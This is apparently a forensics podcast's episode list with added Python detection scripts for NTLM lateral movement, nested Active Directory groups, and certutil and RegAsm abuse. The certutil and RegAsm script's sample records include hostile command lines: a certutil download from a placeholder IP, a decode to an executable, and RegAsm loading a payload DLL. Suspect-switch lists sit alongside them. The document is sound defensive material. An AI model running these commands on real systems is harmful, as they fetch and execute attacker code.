
DFSP # 411 - NTLM Credential Validation
This week I'm talking about detecting evidence of lateral movement on Windows systems using NTLM credential validation events. Much like the episode I did on Kerberos, NTLM events offer the same advant...
2 Jan 2024, 18min
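
The detection idea behind this episode, as an added example (not code from the podcast or its host): NTLM credential validation is recorded as Security Event ID 4776 on the domain controller (and on the local machine for local accounts), with a Logon Account, a Source Workstation and an NTSTATUS Error Code. One set of credentials validated from many workstations within minutes is the shape of pass-the-hash style lateral movement; bursts of failures from one source are spraying or guessing. The events below are constructed, the field names are a reduction of the 4776 record, and the window/threshold values are assumptions to tune per environment.

```python
"""Lateral-movement triage over NTLM credential validation events.

Added example for this page, not code from the podcast. It assumes Event ID
4776 records exported from a domain controller, reduced to four fields:
time, Logon Account, Source Workstation and the NTSTATUS Error Code.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real log data). Status 0x0 is success;
# the other codes are the NTSTATUS values a 4776 record reports on failure.
SAMPLE_EVENTS = [
    {"time": "2023-12-20T08:01:10", "account": "jsmith", "source": "WS-042", "status": "0x0"},
    {"time": "2023-12-20T08:03:42", "account": "jsmith", "source": "WS-043", "status": "0x0"},
    {"time": "2023-12-20T08:05:05", "account": "jsmith", "source": "SRV-FILE01", "status": "0x0"},
    {"time": "2023-12-20T08:06:30", "account": "jsmith", "source": "SRV-SQL02", "status": "0x0"},
    {"time": "2023-12-20T09:00:00", "account": "bjones", "source": "WS-017", "status": "0x0"},
    {"time": "2023-12-20T11:00:00", "account": "bjones", "source": "WS-017", "status": "0x0"},
    {"time": "2023-12-20T12:00:00", "account": "bjones", "source": "WS-017", "status": "0x0"},
    {"time": "2023-12-20T13:10:01", "account": "alice", "source": "WS-099", "status": "0xC000006A"},
    {"time": "2023-12-20T13:10:02", "account": "bob", "source": "WS-099", "status": "0xC000006A"},
    {"time": "2023-12-20T13:10:03", "account": "carol", "source": "WS-099", "status": "0xC000006A"},
    {"time": "2023-12-20T13:10:04", "account": "zzz-admin", "source": "WS-099", "status": "0xC0000064"},
]

STATUS_NAMES = {
    "0xC000006A": "wrong_password",
    "0xC0000064": "unknown_account",
    "0xC0000234": "locked_out",
}


def fan_out(events, window=timedelta(minutes=10), threshold=3):
    """Accounts validated successfully from at least `threshold` distinct
    source workstations inside one sliding `window`.

    A normal user rarely authenticates from several machines within minutes;
    one identity hopping host to host is the classic lateral-movement shape.
    Returns {account: sorted list of source workstations}.
    """
    by_account = defaultdict(list)
    for e in events:
        if e["status"] == "0x0":
            by_account[e["account"]].append(
                (datetime.fromisoformat(e["time"]), e["source"]))
    hits = {}
    for account, rows in by_account.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):
            hosts = {src for t, src in rows[i:] if t - start <= window}
            if len(hosts) >= threshold:
                hits[account] = sorted(hosts)
                break
    return hits


def failure_summary(events):
    """Failed validations grouped by source workstation and failure type.

    Many wrong_password failures for different accounts from one source is
    password spraying; unknown_account failures point at name guessing.
    Returns {source: {failure_type: [accounts]}}.
    """
    out = defaultdict(lambda: defaultdict(list))
    for e in events:
        if e["status"] != "0x0":
            kind = STATUS_NAMES.get(e["status"], e["status"])
            out[e["source"]][kind].append(e["account"])
    return {src: dict(kinds) for src, kinds in out.items()}


if __name__ == "__main__":
    for account, hosts in fan_out(SAMPLE_EVENTS).items():
        print(f"{account}: validated from {len(hosts)} hosts within 10 min: {', '.join(hosts)}")
    for src, kinds in failure_summary(SAMPLE_EVENTS).items():
        for kind, accounts in kinds.items():
            print(f"{src}: {len(accounts)} {kind} failure(s) for {', '.join(accounts)}")
```

One caveat when reading these results: the Source Workstation in a 4776 record is the workstation name the client supplied in the NTLM exchange, so it can be blank or forged; corroborate a hit with the 4624 logon events on the target hosts before treating it as confirmed movement.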

DFSP # 410 - Linux Temp Directories
Temporary directories play a significant role in computer forensic investigations because they can contain valuable digital evidence. When conducting a computer forensic investigation, these te...
26 Dec 2023, 15min

DFSP # 409 - Regsvcs and Regasm Abuse
This week I'm talking about Regsvcs/Regasm exploitation, a Windows tactic attackers use to evade defense mechanisms and execute code. Specifically, this technique can be used to bypass proce...
19 Dec 2023, 11min

DFSP # 408 - Nesting
This week I'm talking about nested groups and the risk they pose for security. Built into the functionality of Active Directory is the ability to attach a group to another group. While this has advan...
12 Dec 2023, 13min
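
The risk in the nesting episode is that a user's effective rights are not visible in the direct member list of a privileged group. As an added example (not code from the podcast or its host), the block below resolves effective membership from a flat group-to-members export, reports who reaches the privileged group only through nesting, and survives the membership cycles that break naive recursive scripts. The export is constructed; the "grp-" naming, the choice of "Domain Admins" as the group under review and the rule that a member is a group exactly when it appears as a key are assumptions of the example.

```python
"""Effective membership of nested Active Directory groups.

Added example for this page, not code from the podcast. It assumes a flat
export of direct group members; a member is treated as a group exactly when
it appears as a key in the export (assumption of this example).
"""
from collections import deque

# Constructed export (not a real directory): group -> direct members.
DIRECT_MEMBERS = {
    "Domain Admins": ["admin.root", "grp-tier0-ops"],
    "grp-tier0-ops": ["grp-platform-eng"],
    "grp-platform-eng": ["grp-helpdesk", "pat.eng"],
    "grp-helpdesk": ["hd.intern", "grp-platform-eng"],  # nesting cycle
    "grp-finance": ["fin.user"],
}


def effective_members(group, members=DIRECT_MEMBERS):
    """Return {user: path}, where path lists the groups that carry the user
    into `group`, shortest chain first (breadth-first walk).

    The `seen` set stops the walk from looping on group cycles.
    """
    result, seen = {}, {group}
    queue = deque([(group, [group])])
    while queue:
        current, path = queue.popleft()
        for member in members.get(current, []):
            if member in members:            # a nested group
                if member not in seen:
                    seen.add(member)
                    queue.append((member, path + [member]))
            elif member not in result:       # a user account
                result[member] = path + [member]
    return result


def nested_only(group, members=DIRECT_MEMBERS):
    """Users who hold `group` rights but are not listed as direct members:
    the population an audit of the direct member list would miss."""
    direct = {m for m in members.get(group, []) if m not in members}
    return set(effective_members(group, members)) - direct


def nesting_cycles(members=DIRECT_MEMBERS):
    """Return each group cycle as a list ending at its starting group.

    A cycle grants no extra access, but it hangs or stack-overflows scripts
    that expand membership recursively without a visited set.
    """
    cycles, colour = [], {}

    def visit(group, path):
        colour[group] = "grey"
        for member in members.get(group, []):
            if member not in members:
                continue
            if colour.get(member) == "grey":
                cycles.append(path[path.index(member):] + [member])
            elif member not in colour:
                visit(member, path + [member])
        colour[group] = "black"

    for group in members:
        if group not in colour:
            visit(group, [group])
    return cycles


if __name__ == "__main__":
    for user, path in effective_members("Domain Admins").items():
        print(f"{user}: {' -> '.join(path)}")
    print("nested only:", sorted(nested_only("Domain Admins")))
    print("cycles:", nesting_cycles())
```

Against the constructed data, hd.intern (a helpdesk intern) is four hops away from Domain Admins and never appears in its direct member list; that chain is what a reviewer should be hunting for, and the cycle between grp-helpdesk and grp-platform-eng is exactly the structure that makes a quick recursive one-liner unreliable.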

DFSP # 407 - More About Lateral Movement and Kerberos
This week it's more about lateral movement and Kerberos events.
5 Dec 2023, 19min

DFSP # 406 - All the BIN Directories
In a typical Linux "bin" directory, you can find various types of executable files and scripts that are used to perform different tasks. The confusing part is that there are a number of different BIN ...
28 Nov 2023, 14min

DFSP # 405 - Werfault Attacks
Werfault is an interesting artifact in that there is not a lot of documentation on it, yet it may affect an investigation in different ways. Its appearance in logs sometimes adds a bit of confusio...
21 Nov 2023, 14min

DFSP # 404 - Certutil Attacks
Certutil, a powerful command-line utility, can be misused by malicious actors to establish illicit network connections. It is therefore crucial to familiarize oneself with its leg...
14 Nov 2023, 12min
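
Certutil (this episode) and Regsvcs/Regasm (episode 409) are both signed Microsoft binaries that attackers borrow, so a detection has to key on how they are invoked rather than on the binary itself. As an added example (not code from the podcast or its host), the block below triages process-creation records for the well-known patterns: certutil asked to fetch a URL (-urlcache -split -f) or to decode a dropped file, and RegAsm/RegSvcs pointed at an assembly in a user-writable directory, run with /U (which fires the unregister code path) or spawned from a script host. The records are constructed, the field names are a reduction of what Sysmon Event ID 1 or Security Event 4688 carry, and the user-writable path list and script-host set are assumptions to extend per environment.

```python
"""Command-line triage for certutil and RegAsm/RegSvcs abuse.

Added example for this page, not code from the podcast. It assumes
process-creation records reduced to three fields (image path, command line,
parent image); the path and parent lists are assumptions of the example.
"""
import re
import shlex
from pathlib import PureWindowsPath

# Constructed sample records (not real telemetry).
SAMPLE_PROCESSES = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil.exe -urlcache -split -f http://203.0.113.5/update.bin C:\Users\Public\update.bin",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -decode C:\Users\jsmith\AppData\Local\Temp\a.txt C:\Users\jsmith\AppData\Local\Temp\a.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",          # benign: list a cert store
     "cmd": r"certutil -store my",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe",
     "cmd": r"RegAsm.exe /U C:\Users\jsmith\Downloads\payload.dll",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe",  # benign: installer
     "cmd": r'RegSvcs.exe "C:\Program Files\Vendor\Component.dll"',
     "parent": r"C:\Program Files\Vendor\setup.exe"},
]

# certutil switches that move or transform file content rather than manage certificates.
CERTUTIL_SUSPECT = {"-urlcache", "-decode", "-decodehex", "-encode", "-verifyctl"}
# Parents that should not normally be registering .NET assemblies (assumption).
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# Locations an unprivileged user can write to (assumption; extend per environment).
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|Users\\Public|Windows\\Temp|ProgramData)\\",
    re.IGNORECASE)


def triage(proc):
    """Return a list of reasons the record deserves a look (empty if none)."""
    name = PureWindowsPath(proc["image"]).name.lower()
    parent = PureWindowsPath(proc["parent"]).name.lower()
    # posix=False keeps Windows backslashes literal; quotes are kept and stripped here.
    tokens = [t.strip('"') for t in shlex.split(proc["cmd"], posix=False)]
    flags = {t.lower().replace("/", "-", 1) for t in tokens[1:] if t[:1] in ("-", "/")}
    operands = [t for t in tokens[1:] if t[:1] not in ("-", "/")]
    reasons = []
    if name == "certutil.exe":
        hit = flags & CERTUTIL_SUSPECT
        if hit:
            reasons.append(f"certutil used with {sorted(hit)}")
        if any(o.lower().startswith(("http://", "https://", "ftp://")) for o in operands):
            reasons.append("certutil given a URL operand (download)")
    elif name in ("regasm.exe", "regsvcs.exe"):
        if "-u" in flags:
            reasons.append(f"{name} run with /U (unregister code path)")
        for o in operands:
            if USER_WRITABLE.search(o):
                reasons.append(f"{name} loading assembly from user-writable path {o}")
        if parent in SCRIPT_HOSTS:
            reasons.append(f"{name} spawned by {parent}")
    return reasons


def triage_all(procs):
    """{record index: reasons} for every record that produced at least one reason."""
    return {i: r for i, p in enumerate(procs) if (r := triage(p))}


if __name__ == "__main__":
    for i, reasons in triage_all(SAMPLE_PROCESSES).items():
        print(f"[{i}] {SAMPLE_PROCESSES[i]['cmd']}")
        for r in reasons:
            print(f"     - {r}")
```

These are leads, not verdicts: installers legitimately invoke RegAsm and RegSvcs, and certutil -urlcache has administrative uses, which is why the two benign records above come back empty. The legitimate usage the episode stresses is the baseline that turns these heuristics into something you can tune.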
